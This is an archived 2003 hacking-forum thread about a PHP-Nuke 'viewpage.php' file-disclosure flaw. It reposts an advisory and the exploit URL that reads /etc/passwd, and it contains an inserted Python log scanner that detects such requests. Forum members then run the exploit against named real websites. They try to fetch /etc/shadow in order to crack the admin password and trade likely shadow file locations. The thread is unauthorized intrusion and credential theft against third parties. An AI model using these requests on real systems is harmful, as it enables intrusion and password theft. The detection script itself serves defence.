View full version: PHP-Nuke Input Validation Flaw in 'viewpage.php' Discloses Files
فلسطين في القلب
29-03-2003, 07:40
PHP-Nuke Input Validation Flaw in 'viewpage.php' Discloses Files on the System to Remote Users
SecurityTracker Alert ID: 1006377
CVE Reference: GENERIC-MAP-NOMATCH
Updated: Mar 26 2003
Original Entry Date: Mar 25 2003
Impact: Disclosure of system information, Disclosure of user information
Exploit Included: Yes
Version(s): 6.5
Description: An input validation flaw vulnerability was reported in PHP-Nuke. A remote user can view files on the system that are readable by the web server.
It is reported that a remote user can specify a file name via the 'viewpage.php' script to read the file with the privileges of the web server process:
http://[target]/viewpage.php?file=/etc/passwd
Impact: A remote user can view specified files on the system with the privileges of the web server.
Solution: No solution was available at the time of this entry.
Vendor URL: www.phpnuke.org/
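A defender-side check for the request pattern in the advisory above, as an added example that is not part of the original post or of PHP-Nuke: it scans web server access logs for `viewpage.php` requests whose `file` parameter is an absolute path. It goes slightly beyond the advisory by also flagging percent-encoded values and `..` traversal; the log lines, addresses and the `config.php` name are constructed sample data.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (Combined Log Format, documentation-range addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [29/Mar/2003:07:45:01 +0000] "GET /viewpage.php?file=privacy.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
192.0.2.44 - - [29/Mar/2003:08:35:12 +0000] "GET /viewpage.php?file=/etc/passwd HTTP/1.0" 200 1874 "-" "Mozilla/4.0"
192.0.2.44 - - [29/Mar/2003:08:36:40 +0000] "GET /viewpage.php?file=%2Fetc%2Fshadow HTTP/1.0" 200 212 "-" "Mozilla/4.0"
198.51.100.7 - - [29/Mar/2003:09:02:09 +0000] "GET /viewpage.php?file=..%2F..%2Fconfig.php HTTP/1.0" 200 930 "-" "Mozilla/4.0"
198.51.100.7 - - [29/Mar/2003:09:03:30 +0000] "GET /index.php?file=/etc/passwd HTTP/1.0" 404 310 "-" "Mozilla/4.0"
"""

# client, timestamp, request target and status from one Combined Log Format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')


def classify(value):
    """Return why a decoded 'file' value is suspicious, or None for a plain page name."""
    if value.startswith(("/", "\\")) or re.match(r"[A-Za-z]:", value):
        return "absolute path"
    if ".." in re.split(r"[\\/]", value):
        return "directory traversal"
    return None


def find_disclosure_attempts(log_text, script="/viewpage.php"):
    """Return (client, timestamp, file value, reason, status) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, target, status = m.groups()
        url = urlsplit(target)
        if url.path != script:
            continue
        # parse_qs percent-decodes, so %2Fetc%2Fshadow is checked as /etc/shadow
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            reason = classify(value)
            if reason:
                hits.append((client, when, value, reason, int(status)))
    return hits


if __name__ == "__main__":
    for hit in find_disclosure_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request only shows that the script ran; the response size and the target file's permissions decide whether contents were actually disclosed.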
فلسطين في القلب
29-03-2003, 07:42
Example:
http://server.com/viewpage.php?file=/etc/passwd
hi_HaCkEr
29-03-2003, 08:35
OR
I think there is a problem with this exploit or with me
I tried it on this site
http://www.thebix.com/viewpage.php?file=/etc/passwd
but there is not any result
i hope 2 discuss it here
c ya
bye
فلسطين في القلب
29-03-2003, 09:00
also really it is very nice to discuss the exploit here, also as you said my dear hi hacker, maybe there is a problem, and I did try it but I did not get anything. anyway I did read that this script allows an attacker to view all files on the system and it is, as you may know, a part of PHPNuke. but I do not think that it is too easy to get it, I think there is a trick to get it and I will search now, maybe there is new info about it
anyway I did try it and will try again and hope that all discuss with us to get it
with my greazzzzzzzz
فلسطين في القلب
29-03-2003, 10:11
umm, what version of phpNuke is vulnerable to this? this is the question, and as you see my bro, there has not been any viewpage.php since before 5.0. I believe it must work on PHP-Nuke 6.5, and the site you tried it on is not running on PHP; also we have to find a site running on PHP-Nuke 6.5.
I searched but I have not found any one yet :confused::confused::confused:
maybe you can help me
فلسطين في القلب
07-04-2003, 08:33
Also salam again brothers,
I posted this exploit but only hi hacker wrote about it. also I dunno but I wanna understand it; also I have searched about it on the net but this is new and I did not find anything, let us try together
also go to www.google.com and search for viewpage.php?file= , you see many sites, also now let us take this site
http://www.finalturn.com/viewpage.php?file=privacy.php also now to use this exploit delete the privacy.php and put /etc/passwd , now you get the passwd as this
and more, also to discuss that,
the root is root, also look at the color X, this is the password of the admin but it is shadowed (( modala )), we have to find the shadow file to get the shadow pass and to crack it, but my question is where can I find the shadow file :confused::confused:
as I know, we can get the shadow file in /etc/shadow and /etc/master.passwd and /etc/security/passwd , also I do not know more places for the shadow, maybe you can help me if any one knows
thats all ,
dtwrap2003
07-04-2003, 08:39
Thanks, brother. This vulnerability worked on my own magazine, and a question: why are you speaking in English,
although I did understand the topic
Thanks
And I repeat my apology to you
فلسطين في القلب
07-04-2003, 08:40
also sorry I forgot to say that you try the link to get the shadow, under this link http://www.finalturn.com/viewpage.php?file=/etc/shadow
you will get ..... failed to create stream: Permission denied. that means the shadow is here but forbidden, but on another site you can not open the shadow, that means there are other places for the shadow
i need them
فلسطين في القلب
07-04-2003, 08:44
it is ok bro, we are still brothers, of course, but I dunno why I write English; really I have no Arabic keyboard and I type blind, so I am faster in English
as I said, you don't need to say sorry, we are still always brothers and I respect ur choice
dtwrap2003
09-04-2003, 09:11
ok my brother
hi_HaCkEr
10-04-2003, 12:40
I'm writing in English 2 practice my English and 2 improve it, coz we live in Arabian countries, not like my bro linux hacker, he always speaks English and his language is excellent
and I'm sorry that I wasn't with u 4 trying this exploit, but I will, I promise u
bye
قبلة الموت
11-04-2003, 05:21
Originally posted by dtwrap2003
Thanks, brother. This vulnerability worked on my own magazine, and a question: why are you speaking in English,
although I did understand the topic
Thanks
And I repeat my apology to you
Right, by God >> OK, could you translate for us what they said
look, I write English, but in Arabic :p
جوادالليل
11-05-2003, 03:30
I love your subjects
but all Arabs who don't speak English can't know what you are saying
:rolleyes::rolleyes:
قبلة الموت
11-05-2003, 04:21
Hi all >>> I will try writing English with you
so I was looking for PHP-Nuke 6.5. when I get any site in the results and try it I can't find any results like you ( lunix :( why
http://www.thebix.com/viewpage.php?file=/etc/passwd
what do you mean by ( viewpage.php ) ??? I can't understand it
so all my brothers
I'm not good in English > :D
but I want to try with you
فلسطين في القلب
11-05-2003, 04:43
OK, we have switched to Arabic .......... This is a vulnerability that appeared a month ago .. The vulnerability lets you open the password folder .. but the password is shadowed in etc/passwd, and to get the password you have to open the file etc/shadow, and since you are an expert you now know that you cannot open that file because you are not root .. and the vulnerability has been patched
I think you understood me ..
:D:D:D:D:D:D
قبلة الموت
11-05-2003, 04:51
Yes, I understood you. ;)